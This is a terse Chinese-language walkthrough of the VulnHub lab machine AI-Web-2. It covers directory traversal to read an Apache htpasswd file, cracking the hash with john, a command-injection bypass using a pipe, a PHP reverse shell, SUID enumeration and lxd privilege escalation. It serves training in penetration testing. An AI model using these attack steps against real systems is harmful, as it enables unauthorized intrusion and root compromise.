靶機下載鏈接:
https://www.vulnhub.com/entry/ai-web-2,357
主機端口掃描:
嘗試SQL注入,未發現有注入漏洞,就注冊創建於一賬戶
http://10.10.202.160/userpage.php
漏洞庫搜索下:
XuezhuLi FileSharing - Directory Traversal
https://www.exploit-db.com/exploits/40009
我們爆破下目錄看下
╰─ sudo python3 dirsearch.py -u http://10.10.202.160/ -e .php
我們嘗試包含下Apache的認證文件看看
aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt htpwd
aiweb2admin:c.ronaldo
經過嘗試&& ; | 發現| 可以繞過執行命令
訪問:http://10.10.202.160/webadmin/H05Tpin9555/php-reverse.php
接下來進行提權操作:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh
╰─ searchsploit lxd
創建hack.sh 文件,拷貝如下鏈接的腳本內容到hack.sh
https://www.exploit-db.com/exploits/46978
OVER !!